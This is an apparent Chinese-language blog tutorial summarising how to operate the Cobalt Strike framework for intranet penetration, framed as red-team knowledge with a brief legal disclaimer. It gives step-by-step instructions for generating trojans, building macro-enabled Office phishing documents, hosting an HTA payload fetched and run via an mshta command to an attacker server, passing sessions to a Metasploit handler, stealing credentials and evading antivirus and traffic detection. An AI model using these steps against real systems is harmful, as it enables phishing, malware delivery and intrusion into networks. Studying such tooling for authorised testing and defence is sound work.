Cobalt Strike(CS)内网渗透工具核心重点知识总结

一、工具基础认知

  1. 定位:美国红队专用商业渗透测试工具,多用于内网渗透、APT攻击,是红队核心武器,常联动Mimikatz等工具。

  2. 架构单服务端+多客户端,支持多人团队分布式协同操作。

  3. 核心能力:多协议主机上线、权限提升、凭据窃取、端口转发/SOCKS代理、Office钓鱼、木马捆绑、文件管理、屏幕监控、内网扫描等。

  4. 官网https://www.cobaltstrike.com

  5. 核心流量控制:依靠Malleable C2 Profile自定义流量特征,规避安全设备检测;默认服务端口50050,已被安全设备拉黑,实战必须修改端口。

二、CS环境搭建(Linux服务端+Windows客户端)

1. 服务端启动步骤(Kali Linux)

复制代码
# 1. 进入服务端目录
cd root/CS4.8/server
# 2. 赋予运行权限
chmod +x teamserver
chmod +x TeamServerImage
# 3. 启动服务端(格式:./teamserver 本机IP 密码 c2配置文件)
./teamserver IP 密码 profile.c2

2. Windows客户端连接

  1. 运行Cobalt_Strike_CN.bat打开客户端;

  2. 填写服务端IP、修改后的端口、自定义用户名、服务端设置的密码完成连接;

  3. 多团队协作通信:

    • 公屏聊天:直接输入消息;

    • 私聊:/msg 用户名 消息内容

三、木马生成完整流程(核心操作)

整体流程:新建监听器 → 选择载荷类型生成木马 → 保存木马 → 目标运行后CS上线

1. 监听器两种核心模式

  • reverse_http(反向连接):目标主动连接服务端,实战最常用;

  • beacon_bind(正向连接):主动去连接目标,内网隔离场景使用。

2. 主流木马载荷类型

载荷类型 用途
Office宏 Word/Excel/PPT钓鱼,邮件攻击主流
HTA文档 html应用程序,通过mshta命令远程加载执行
Windows可执行程序EXE 普通exe木马,分Staged(分段)/Stageless(无分段免杀更优)
Payload生成器 输出各类语言shellcode,供二次开发免杀

3. 上线逻辑

将生成的木马上传至目标主机执行,CS监听器捕获连接,目标主机出现在主机列表即上线成功。

四、Beacon核心后置渗透功能(目标上线后操作)

右键上线主机进入Beacon命令行,输入?查看全部可用指令

  1. 基础命令

    • sleep 数值:调整Beacon回连延时,sleep 0切换交互式实时连接;

    • shell 命令:执行系统命令(shell whoamishell ipconfigshell dir);

    • upload/download:远程上传、下载目标文件。

  2. 图形化管控

    • 远程VNC:无交互远程桌面控制目标;

    • 文件管理器:可视化浏览、增删改目标磁盘文件。

  1. 内网探测功能

    • 进程列表:查看所有进程,支持结束进程、伪造Token;

    • 网段扫描:支持ARP/ICMP扫描同网段存活主机、端口探测(ARP扫描防火墙难以拦截);

    • Net View:查询局域网共享主机,横向渗透前置信息收集。

五、插件加载扩展能力

  1. 插件格式:.cna后缀文件;

  2. 加载流程:CS左上角「Cobalt Strike」→「脚本管理器」→Load→选中.cna插件打开;

  3. 加载成功标识:脚本管理器状态栏出现对勾;

  4. 常用插件:Ladon、OLa、梼杌、谢公子等,拓展内网扫描、提权、凭证抓取功能。

六、CS联动MSF(弥补CS漏洞库短板)

操作步骤

  1. Kali启动MSF控制台:msfconsole

  2. CS新建监听器:Payload选择Foreign HTTP,填写Kali主机IP、自定义端口;

  1. MSF配置反向监听:
复制代码
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set Lhost Kali_IP
set Lport 监听端口
run
  1. CS右键上线主机 →「增加会话」,选中MSF监听,流量转发至MSF,获取Meterpreter会话。

七、主流钓鱼木马制作(实战攻击手段)

1. Office宏木马(邮件钓鱼首选)

  1. CS生成Office宏代码,复制剪贴板;

  2. Word/Excel/PPT:视图→查看宏→新建宏,清空默认代码,粘贴CS生成宏;

  3. 保存格式必须为启用宏文档.xlsm/.docm),普通xlsx/doc会禁用宏;

  4. 目标打开文档点击「启用内容」,CS自动上线。

2. HTA网页木马

  1. CS生成.hta文件;

  2. CS站点管理-文件托管,对外提供木马下载URL;

  3. 目标CMD执行命令上线:mshta http://服务端IP:端口/download/file.ext

八、安全&实战关键要点

  1. 流量规避:必须自定义teamserver端口、配置Malleable C2 Profile修改流量特征,默认配置极易被安全设备查杀;

  2. 免杀环节:原生EXE、宏文件极易被杀毒拦截,实战需做免杀处理;

  3. 法律风险:该工具仅可用于企业授权范围内的安全渗透测试,未经授权使用、传播木马属于违法犯罪;

  4. 横向渗透基础:ARP扫描、共享探测、端口转发、凭据抓取是内网横向移动核心前置操作;

  5. 工具互补:CS擅长主机持久化、团队协同;MSF漏洞库丰富,二者联动可覆盖全流程渗透。

相关推荐
Fnetlink112 小时前
Fnet 云网安 260904
网络·人工智能·安全·web安全·网络安全
TechWayfarer15 小时前
Cloudflare 9·15新政倒计时:用IP风险画像识别AI爬虫,防止误伤Googlebot
网络·人工智能·爬虫·python·tcp/ip·网络安全
ynm11116 小时前
2026.8.31(2)【AES】MRCTF2020 Unravel!!
网络安全·buuctf·青少年ctf
三84417 小时前
SSRF 从入门到实战:原理、危害与基础利用
服务器·网络安全·ssrf·#web安全
小小小小钰儿17 小时前
1.2-AI核心理论与术语
人工智能·计算机·网络安全·信息安全·程序员·编程
学逆向的1 天前
扩展PE头属性说明
开发语言·网络安全·pe
Latticy2 天前
vulnhub系列靶机-Photographer
网络·网络安全·内网渗透·内网
sbjdhjd2 天前
PHP eval 型 RCE:flag 正则过滤与通配符绕过实操 | 01
安全·web安全·网络安全·开源·系统安全·php·网络攻击模型
数据知道2 天前
静态分析入门——PE 结构、字符串、导入表快速定性
网络·安全·web安全·网络安全
芯盾时代2 天前
金融新规全条款合规落地映射的解决方案
网络·网络安全·金融